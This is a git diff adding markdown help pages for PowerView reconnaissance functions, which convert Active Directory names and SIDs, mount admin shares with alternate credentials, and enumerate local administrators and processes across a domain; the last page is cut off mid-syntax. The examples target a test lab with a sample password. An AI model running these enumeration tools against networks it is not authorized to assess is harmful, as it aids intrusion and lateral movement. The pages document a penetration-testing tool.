(@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Add-RemoteConnection [-ComputerName] -Credential +``` + +### Path +``` +Add-RemoteConnection [-Path] -Credential +``` + +## DESCRIPTION +This function uses WNetAddConnection2W to make a 'temporary' (i.e. +not saved) connection +to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the +-Credential object. +If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. + +To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path +or -ComputerName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Cred = Get-Credential +``` + +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$Cred = Get-Credential +``` + +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the system to add a \\\\ComputerName\IPC$ connection for. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to add the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md new file mode 100755 index 00000000..7f9f42bb --- /dev/null +++ b/docs/Recon/Convert-ADName.md @@ -0,0 +1,184 @@ +# Convert-ADName + +## SYNOPSIS +Converts Active Directory object names between a variety of formats. + +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Convert-ADName [-Identity] [[-OutputType] ] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Convert-ADName -Identity "TESTLAB\harmj0y" +``` + +harmj0y@testlab.local + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical +``` + +testlab.local/Users/krbtgt +testlab.local/Users/Administrator + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local +``` + +CN=harmj0y,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -Identity +Specifies the Active Directory object name to translate, of the following form: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. +'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, ObjectName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OutputType +Specifies the output name type you want to convert to, which must be one of the following: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. +'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. +'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more objects name strings on the pipeline. + +## OUTPUTS + +### String + +Outputs a string representing the converted name. + +## NOTES + +## RELATED LINKS + +[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67) + diff --git a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md new file mode 100755 index 00000000..186e19b6 --- /dev/null +++ b/docs/Recon/ConvertFrom-SID.md @@ -0,0 +1,126 @@ +# ConvertFrom-SID + +## SYNOPSIS +Converts a security identifier (SID) to a group/user name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName + +## SYNTAX + +``` +ConvertFrom-SID [-ObjectSid] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 +``` + +TESTLAB\harmj0y + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID +``` + +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -ObjectSid +Specifies one or more SIDs to convert. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SID + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SID strings on the pipeline. + +## OUTPUTS + +### String + +The converted DOMAIN\username. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md new file mode 100755 index 00000000..c75f9421 --- /dev/null +++ b/docs/Recon/ConvertFrom-UACValue.md @@ -0,0 +1,127 @@ +# ConvertFrom-UACValue + +## SYNOPSIS +Converts a UAC int value to human readable form. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +ConvertFrom-UACValue [-Value] [-ShowAll] +``` + +## DESCRIPTION +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. +By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-UACValue -Value 66176 +``` + +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll +``` + +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 + +## PARAMETERS + +### -Value +Specifies the integer UAC value to convert. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: UAC, useraccountcontrol + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### Int + +Accepts an integer representing a UAC binary blob. + +## OUTPUTS + +### System.Collections.Specialized.OrderedDictionary + +An ordered dictionary with the converted UAC fields. + +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md new file mode 100755 index 00000000..71e9cea6 --- /dev/null +++ b/docs/Recon/ConvertTo-SID.md @@ -0,0 +1,120 @@ +# ConvertTo-SID + +## SYNOPSIS +Converts a given user/group name to a security identifier (SID). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain + +## SYNTAX + +``` +ConvertTo-SID [-ObjectName] [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. +If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertTo-SID 'DEV\dfm' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred + +## PARAMETERS + +### -ObjectName +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, Identity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more username specification strings on the pipeline. + +## OUTPUTS + +### String + +A string representing the SID of the translated name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md new file mode 100755 index 00000000..d2d2a89f --- /dev/null +++ b/docs/Recon/Export-PowerViewCSV.md @@ -0,0 +1,117 @@ +# Export-PowerViewCSV + +## SYNOPSIS +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Export-PowerViewCSV -InputObject [-Path] [[-Delimiter] ] [-Append] +``` + +## DESCRIPTION +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. +This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. + +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' +``` + +## PARAMETERS + +### -InputObject +Specifies the objects to export as CSV strings. + +```yaml +Type: PSObject[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the path to the CSV output file. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delimiter +Specifies a delimiter to separate the property values. +The default is a comma (,) + +```yaml +Type: Char +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: , +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Append +Indicates that this cmdlet adds the CSV output to the end of the specified file. +Without this parameter, Export-PowerViewCSV replaces the file contents without warning. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### PSObject + +Accepts one or more PSObjects on the pipeline. + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/) + diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md new file mode 100755 index 00000000..be4055fc --- /dev/null +++ b/docs/Recon/Find-DomainLocalGroupMember.md @@ -0,0 +1,351 @@ +# Find-DomainLocalGroupMember + +## SYNOPSIS +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainLocalGroupMember [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-GroupName ] [-Method ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainLocalGroupMember +``` + +Enumerates the local group memberships for all reachable machines in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainLocalGroupMember -Domain dev.testlab.local +``` + +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred + +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md new file mode 100755 index 00000000..280e8ef5 --- /dev/null +++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md @@ -0,0 +1,261 @@ +# Find-DomainObjectPropertyOutlier + +## SYNOPSIS +Finds user/group/computer objects in AD that have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass + +## SYNTAX + +### ClassName (Default) +``` +Find-DomainObjectPropertyOutlier [-ClassName] [-ReferencePropertySet ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### ReferenceObject +``` +Find-DomainObjectPropertyOutlier [-ReferencePropertySet ] -ReferenceObject + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass. +If a -ReferenceObject is passed, the class is extracted from the passed object. +A 'reference' set of property names is then calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. +These property names are substracted +from the master schema propertyu name list to retrieve a set of 'non-standard' properties. +Every user/group/computer object (depending on determined class) are enumerated, and for each +object, if the object has a 'non-standard' property set, the object samAccountName, property +name, and property value are output to the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainObjectPropertyOutlier -User +``` + +Enumerates users in the current domain with 'outlier' properties filled in. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainObjectPropertyOutlier -Group -Domain external.local +``` + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier +``` + +Enumerates computers in the current domain with 'outlier' properties filled in. + +## PARAMETERS + +### -ClassName +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +```yaml +Type: String +Parameter Sets: ClassName +Aliases: Class + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferencePropertySet +Specifies an array of property names to diff against the class schema. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferenceObject +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. + +```yaml +Type: PSObject +Parameter Sets: ReferenceObject +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md new file mode 100755 index 00000000..89dc568d --- /dev/null +++ b/docs/Recon/Find-DomainProcess.md @@ -0,0 +1,517 @@ +# Find-DomainProcess + +## SYNOPSIS +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +## SYNTAX + +### None (Default) +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserGroupIdentity ] [-Server ] [-SearchScope ] [-ResultPageSize ] + 